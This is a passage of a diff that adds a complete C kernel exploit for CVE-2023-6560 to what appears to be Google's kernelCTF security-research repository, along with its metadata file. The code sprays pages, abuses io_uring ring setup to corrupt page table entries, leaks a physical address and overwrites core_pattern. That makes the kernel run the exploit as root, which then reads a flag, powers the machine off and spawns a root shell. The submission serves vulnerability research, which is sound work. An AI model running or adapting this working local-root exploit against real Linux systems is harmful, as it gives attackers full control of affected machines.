COLOR_DEFAULT, __FILE__, \ + __LINE__, ##__VA_ARGS__) +#define logw(fmt, ...) \ + dprintf(2, COLOR_YELLOW "[!] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, \ + __LINE__, ##__VA_ARGS__) +#define loge(fmt, ...) \ + dprintf(2, COLOR_RED "[-] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, \ + __LINE__, ##__VA_ARGS__) +#define die(fmt, ...) 
\ + do { \ + loge(fmt, ##__VA_ARGS__); \ + loge("Exit at line %d", __LINE__); \ + exit(1); \ + } while (0) + +#define SYSCHK(x) \ + ({ \ + typeof(x) __res = (x); \ + if (__res == (typeof(x))-1) \ + err(1, "SYSCHK(" #x ")"); \ + __res; \ + }) + +#define PAGE_SIZE 4096 +#define PAGE_MASK (~(PAGE_SIZE-1)) +#define PAGE_ALIGN(x) ((x + PAGE_SIZE - 1) & PAGE_MASK) + +#define NUM_SQ_PAGES 8 // Not a critical data, 16, 32 and other numbers will be ok too +#define SQ_SZ PAGE_ALIGN(NUM_SQ_PAGES * PAGE_SIZE) +#define CQ_SZ PAGE_ALIGN(NUM_SQ_PAGES / 2 /* Without IORING_SETUP_CQSIZE flag set, p->cq_entries = 2 * p->sq_entries; */ * PAGE_SIZE + /* offsetof(struct io_rings, cqes) */0x40) +#define NUM_CQ_PAGES (CQ_SZ / PAGE_SIZE) // To solve the align issue +#define SQ_ENTRIES (SQ_SZ / sizeof(struct io_uring_sqe)) // Easy math + +#define MB (1024 * 1024) +#define PTRS_PER_PMD 512 // PAGE_SIZE / sizeof(pte_t) +#define PMD_SZ (PTRS_PER_PMD * PAGE_SIZE) // 2 * MB +#define SPRAY_PIPE_NUM (0x200) // Suitable size to drain order-0 pages +#define SPRAY_PMD_NUM (2 * SPRAY_PIPE_NUM) // Just twice as the num of pipe pages to make sure can reuse the pages back +#define SPRAY_PAGE_SZ (0x4000) // 0x4000 / 0x1000 * sizeof(pte_t) = 2 * sizeof(io_cqe), one fore leak, one for write +#define _BRK (0xFFFFFFFF84E00000) // One quick way to obtain this: open gdb and type `p/x _brk_start` +#define CORE_PATTERN (0xFFFFFFFF83DB3720) // `p core_pattern` +#define SPRAY_PAGES_MMAP_START (0x200000000UL) // Need enough space to avoid overlapping with other mappings +#define BUF_SZ (PAGE_SIZE) // Just a normal buffer for r/w +#define PG_VEC_NUM (0x10) + +static bool writeFile(const char *file, const char *what, ...) { + char buf[1024]; + va_list args; + va_start(args, what); + vsnprintf(buf, sizeof(buf), what, args); + va_end(args); + buf[sizeof(buf) - 1] = 0; + int len = strlen(buf); + int fd = open(file, O_WRONLY | O_CLOEXEC); + if (fd == -1) + return false; + if (write(fd, buf, len) != len) { + int err = errno; + close(fd); + errno = err; + return false; + } + close(fd); + return true; +} + +static void sandboxCommon() { + prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0); + setsid(); + struct rlimit rlim; + rlim.rlim_cur = rlim.rlim_max = (200 << 20); + setrlimit(RLIMIT_AS, &rlim); + rlim.rlim_cur = rlim.rlim_max = 32 << 20; + setrlimit(RLIMIT_MEMLOCK, &rlim); + rlim.rlim_cur = rlim.rlim_max = 136 << 20; + setrlimit(RLIMIT_FSIZE, &rlim); + rlim.rlim_cur = rlim.rlim_max = 1 << 20; + setrlimit(RLIMIT_STACK, &rlim); + rlim.rlim_cur = rlim.rlim_max = 0; + setrlimit(RLIMIT_CORE, &rlim); + rlim.rlim_cur = rlim.rlim_max = 0x8000; + if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) { + rlim.rlim_cur = rlim.rlim_max = 4096; + if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) { + die("setrlimit(RLIMIT_NOFILE, &rlim): %m"); + } + } + + if (unshare(CLONE_NEWUSER | CLONE_NEWNS)) { + die("unshare(CLONE_NEWUSER | CLONE_NEWNS): %m"); + } + + if (unshare(CLONE_NEWNET)) { + die("unshare(CLONE_NEWNET): %m"); + } + + typedef struct { + const char *name; + const char *value; + } sysctl_t; + + static const sysctl_t sysctls[] = { + {"/proc/sys/kernel/shmmax", "16777216"}, + {"/proc/sys/kernel/shmall", "536870912"}, + {"/proc/sys/kernel/shmmni", "1024"}, + {"/proc/sys/kernel/msgmax", "0x8000"}, + {"/proc/sys/kernel/msgmni", "1024"}, + {"/proc/sys/kernel/msgmnb", "1024"}, + {"/proc/sys/kernel/sem", "1024 1048576 500 1024"}, + }; + unsigned i; + for (i = 0; i < sizeof(sysctls) / sizeof(sysctls[0]); i++) + writeFile(sysctls[i].name, sysctls[i].value); +} + +static void 
setCpuAffinity(int cpu_n, pid_t pid) { + cpu_set_t set; + + CPU_ZERO(&set); + CPU_SET(cpu_n, &set); + + if (sched_setaffinity(pid, sizeof(set), &set) < 0) { + die("sched_setaffinity: %m"); + } +} + +void packet_socket_rx_ring_init(int s, unsigned int block_size, + unsigned int frame_size, unsigned int block_nr, + unsigned int sizeof_priv, + unsigned int timeout) { + int v = TPACKET_V3; + int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v)); + if (rv < 0) { + die("setsockopt(PACKET_VERSION): %m"); + } + + struct tpacket_req3 req; + memset(&req, 0, sizeof(req)); + req.tp_block_size = block_size; + req.tp_frame_size = frame_size; + req.tp_block_nr = block_nr; + req.tp_frame_nr = (block_size * block_nr) / frame_size; + req.tp_retire_blk_tov = timeout; + req.tp_sizeof_priv = sizeof_priv; + req.tp_feature_req_word = 0; + + rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req)); + if (rv < 0) { + die("setsockopt(PACKET_RX_RING): %m"); + } +} + +int packet_socket_setup(unsigned int block_size, unsigned int frame_size, + unsigned int block_nr, unsigned int sizeof_priv, + int timeout) { + int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); + if (s < 0) { + die("socket(AF_PACKET): %m"); + } + + packet_socket_rx_ring_init(s, block_size, frame_size, block_nr, sizeof_priv, + timeout); + + struct sockaddr_ll sa; + memset(&sa, 0, sizeof(sa)); + sa.sll_family = PF_PACKET; + sa.sll_protocol = htons(ETH_P_ALL); + sa.sll_ifindex = if_nametoindex("lo"); + sa.sll_hatype = 0; + sa.sll_pkttype = 0; + sa.sll_halen = 0; + + int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa)); + if (rv < 0) { + die("bind(AF_PACKET): %m"); + } + + return s; +} + +int pagealloc_pad(int count, int size) { + return packet_socket_setup(size, 2048, count, 0, 10000); +} + +// core_pattern exploit taken from +// https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/exploit.c#L444 +int check_core() { + // Check if /proc/sys/kernel/core_pattern has been overwritten + char buf[0x100] = {}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + SYSCHK(read(core, buf, sizeof(buf))); + close(core); + return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0; +} +void crash(char *cmd) { + int memfd = memfd_create("", 0); + SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff)); + dup2(memfd, 666); + close(memfd); + while (check_core() == 0) + usleep(100); + /* Trigger program crash and cause kernel to executes program from + * core_pattern which is our "root" binary */ + *(size_t *)0 = 0; +} + +void pwn() { + int pipe_fds[SPRAY_PIPE_NUM][2] = {}; + void *page_spray[SPRAY_PMD_NUM] = {}; + char buf[BUF_SZ] = {}; + void *sqes, *rings; + + // We need a looser limit on files to increase stability & CAP_NET_RAW to spray pg_vec. + sandboxCommon(); + + // Reduce noise when performing page fengshui. + setCpuAffinity(0, getpid()); + + // Prepare pages for spraying ptes. + for (int i = 0; i < SPRAY_PMD_NUM; i++) { + page_spray[i] = + SYSCHK(mmap((void *)(SPRAY_PAGES_MMAP_START + i * PMD_SZ), SPRAY_PAGE_SZ, + PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0)); + } + + // We choose pipe pages to help us do page fengsui because it is easy to spray. + for (int i = 0; i < SPRAY_PIPE_NUM; i++) { + SYSCHK(pipe(pipe_fds[i])); + SYSCHK(write(pipe_fds[i][1], buf, 1)); + } + + // We keep the first half of the pipe pages; hopefully, they can keep the discontinuous order-0 pages. Free those whose indices satisfy `indices % 4 == 0`. 
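+  // Note on the stride of 4: the slots freed here are meant to be reclaimed by
+  // the pg_vec spray right below (giving us CQ's "Page A"), while the three
+  // neighbouring slots in each group are freed afterwards and reclaimed by
+  // page-table (PTE) pages, so Page A ends up adjacent to the PTEs we corrupt.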
+ for (int i = SPRAY_PIPE_NUM / 2; i < SPRAY_PIPE_NUM; i += 4) { + SYSCHK(close(pipe_fds[i][0])); + SYSCHK(close(pipe_fds[i][1])); + pipe_fds[i][0] = 0; + pipe_fds[i][1] = 0; + } + + // Spray pg_vec to hopefully reuse one of the freed slots for a `pg_vec` array.(We only care about the first `pg_vec` buffer, which later will serve as CQ’s Page A.) + int cq_page_a_fd = pagealloc_pad(NUM_CQ_PAGES, PAGE_SIZE); + + // Free the pages whose indices satisfy `indices % 4 != 0`, and spray page table entries in their place. + for (int i = SPRAY_PIPE_NUM / 2; i < SPRAY_PIPE_NUM; i++) { + if (!pipe_fds[i][0]) + continue; + SYSCHK(close(pipe_fds[i][0])); + SYSCHK(close(pipe_fds[i][1])); + pipe_fds[i][0] = 0; + pipe_fds[i][1] = 0; + } + + // Spray pmd page + for (int i = 0; i < SPRAY_PMD_NUM; i++) + *(char *)((size_t)page_spray[i]) = 'A'; + + // Preserving SQ Functionality + int sqes_fd = pagealloc_pad(1, SQ_SZ); + sqes = + SYSCHK(mmap((void *)0x1234000000, SQ_SZ, PROT_READ | PROT_WRITE, + MAP_SHARED | MAP_POPULATE, sqes_fd, 0)); + SYSCHK(mmap((void *)(0x1234000000 + SQ_SZ - PAGE_SIZE), SQ_SZ, + PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED | MAP_POPULATE, + sqes_fd, 0)); + + // Likely CQ’s Page A ends up adjacent to the page table entries we intend to corrupt + rings = SYSCHK(mmap((void *)0xdead0000, CQ_SZ, + PROT_READ | PROT_WRITE, MAP_SHARED, cq_page_a_fd, 0)); + SYSCHK(mmap((void *)0xdead0000 + CQ_SZ - PAGE_SIZE, CQ_SZ, + PROT_READ | PROT_WRITE, MAP_SHARED | MAP_FIXED, cq_page_a_fd, 0)); + + // *&rings->sq.tail = ctx->sq_entries + *(volatile unsigned int *)(rings + 4) = SQ_ENTRIES; + + // Trigger the vulnerability + struct io_uring_params params = { + .flags = IORING_SETUP_NO_MMAP | IORING_SETUP_NO_SQARRAY, + .sq_off = {.user_addr = (unsigned long)sqes}, + .cq_off = {.user_addr = (unsigned long)rings}}; + int uring_fd = SYSCHK( + syscall(__NR_io_uring_setup, /*entries=*/ SQ_ENTRIES, ¶ms)); + logi("uring_fd @ %d", uring_fd); + + // Fill the CQ's Page A + int sqes_offset = 0; + struct io_uring_sqe *sqe = NULL; + for (; sqes_offset < (PAGE_SIZE - /* offsetof(struct io_rings, cqes) */0x40) * (sizeof(struct io_uring_sqe) / sizeof(struct io_uring_cqe)); sqes_offset += sizeof(struct io_uring_sqe)) { + sqe = (struct io_uring_sqe *)(sqes + sqes_offset); + memset(sqe, 0, sizeof(*sqe)); // NOP + } + + // Set up the sqe to overwrite the first page table entry + sqe = (struct io_uring_sqe *)(sqes + sqes_offset); + memset(sqe, 0, sizeof(*sqe)); + sqe->opcode = IORING_OP_NOP; + // 0x9c000: fixed address, please refer to https://github.com/google/security-research/blob/ca13fc6d5e7184b13bb82a91dd3a6fa2430fdbd7/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/exploit.md#leak-through-write + // 0x8000000000000067: page table entry flags (_PAGE_BIT_PRESENT | _PAGE_BIT_RW | _PAGE_BIT_USER | _PAGE_BIT_ACCESSED | _PAGE_BIT_DIRTY | _PAGE_BIT_NX) + sqe->user_data = 0x9c000 | 0x8000000000000067; + sqe++; + + int enter_res; + for (int i = 0; i < (PAGE_SIZE - /* offsetof(struct io_rings, cqes) */0x40) / sizeof(struct io_uring_cqe); i++) { + enter_res = SYSCHK(syscall(__NR_io_uring_enter, uring_fd, 1, 0, 0, 0)); + } + + // Overwrite the first page table entry to leak + enter_res = SYSCHK(syscall(__NR_io_uring_enter, uring_fd, 1, 0, 0, 0)); + + // Find corrupted page table entry + size_t victim_addr = -1, leaked_brk = -1; + for (int i = 0; i < SPRAY_PMD_NUM; i++) { + if (*(size_t *)(page_spray[i]) != 'A') { + victim_addr = (size_t)page_spray[i]; + leaked_brk = *(size_t *)page_spray[i]; + leaked_brk &= PAGE_MASK; +#define 
KASLR_ON +#ifdef KASLR_ON + leaked_brk -= 0x4000; +#else + leaked_brk -= 0x1000; +#endif + logi("fake_page @ %lx phys_leak @ %lx", victim_addr, leaked_brk); + break; + } + } + + // Not found, just exit and pray the kernel won't crash :) + if (victim_addr == -1) { + loge("Bad luck, but may try again..."); + exit(EXIT_FAILURE); + } + + // Found, locate the core_pattern + size_t core_pattern_pa = leaked_brk + (CORE_PATTERN - _BRK); // core_pattern + size_t core_pattern_pte = (core_pattern_pa & PAGE_MASK) | 0x8000000000000067; + logi("core_pattern_pte @ %lx", core_pattern_pte); + + // Set up the sqe to overwrite the second page table entry + sqe->opcode = IORING_OP_NOP; + sqe->user_data = core_pattern_pte; + sqe++; + + // Overwrite the second page table entry to gain the ability to modify core_pattern + enter_res = SYSCHK(syscall(__NR_io_uring_enter, uring_fd, 1, 0, 0, 0)); + + char *fake = "|/proc/%P/fd/666 %P"; + strcpy((void *)(victim_addr + (sizeof(struct io_uring_cqe) / 8) * PAGE_SIZE + (core_pattern_pa & 0xfff)), fake); + if (fork()) { + sleep(100); + } + crash(""); +} +int main(int argc, char **argv) { + if (argc > 1) { + // This section of code will be execute by root! + int pid = strtoull(argv[1], 0, 10); + int pfd = syscall(SYS_pidfd_open, pid, 0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd, 0); + dup2(stdoutfd, 1); + dup2(stderrfd, 2); + /* Get flag and poweroff immediately to boost next round try in PR + * verification workflow*/ + SYSCHK(system("cat /flag;echo o>/proc/sysrq-trigger;")); + execlp("bash", "bash", NULL); + exit(0); + } + // ? As the instance will poweroff after we get the flag + while (1) { + pid_t pid = fork(); + if (pid < 0) { + perror("fork"); + exit(EXIT_FAILURE); + } + + if (pid == 0) { + pwn(); + } + + int status; + waitpid(pid, &status, 0); + } +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/metadata.json new file mode 100644 index 00000000..7808951a --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/metadata.json @@ -0,0 +1,33 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": [ + "exp212" + ], + "vulnerability": { + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=820d070feb668aab5bc9413c285a1dda2a70e076", + "cve": "CVE-2023-6560", + "affected_versions": [ + "6.6 - 6.6.5" + ], + "requirements": { + "attack_surface": [ + "io_uring" + ], + "capabilities": [ + ], + "kernel_config": [ + "CONFIG_IO_URING" + ] + } + }, + "exploits": { + "mitigation-v4-6.6": { + "uses": [ + "io_uring", + "userns" + ], + "requires_separate_kaslr_leak": false, + "stability_notes": "10 times success per 10 times run" + } + } +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/original.tar.gz b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/original.tar.gz new file mode 100644 index 00000000..d22afe51 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/original.tar.gz differ